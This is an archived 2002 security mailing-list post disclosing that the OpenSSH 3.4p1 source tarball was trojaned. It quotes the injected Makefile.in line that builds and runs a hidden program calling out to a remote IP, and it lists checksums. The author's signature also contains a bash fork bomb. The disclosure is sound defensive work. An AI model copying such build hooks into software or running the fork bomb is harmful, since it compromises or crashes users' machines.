OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Edwin Groothuis (edwin_at_mavetju.org)
Date: Thu Aug 01 2002 - 02:35:12 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    FYI (I'm not on -security)

    ----- Forwarded message from Edwin Groothuis <edwinmavetju.org> -----

    Date: Thu, 1 Aug 2002 16:55:51 +1000
    From: Edwin Groothuis <edwinmavetju.org>
    To: incidentssecurityfocus.com
    Subject: openssh-3.4p1.tar.gz trojaned

    Greetings,

    Just want to inform you that the OpenSSH package op ftp.openbsd.org
    (and probably all its mirrors now) it trojaned:

        ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz

    The OpenBSD people have been informed about it (via email to
    deraadtopenbsd.org and via irc.openprojects.org/#openbsd)

    The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
     all: libopenbsd-compat.a
    + $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &

    bf-test.c[1] is nothing more than a wrapper which generates a
    shell-script[2] which compiles itself and tries to connect to an
    server running on 203.62.158.32:6667 (web.snsonline.net).
      
    [1] http://www.mavetju.org/~edwin/bf-test.c
    [2] http://www.mavetju.org/~edwin/bf-output.sh

    This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
    ports system:
        MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

    This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
        MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

    Edwin

    -- 
    Edwin Groothuis      |            Personal website: http://www.MavEtJu.org
    edwinmavetju.org    |    Weblog: http://www.mavetju.org/weblog/weblog.php 
    bash$ :(){ :|:&};:   | Interested in MUDs? http://www.FatalDimensions.org/
    

    To Unsubscribe: send mail to majordomoFreeBSD.org with "unsubscribe freebsd-security" in the body of the message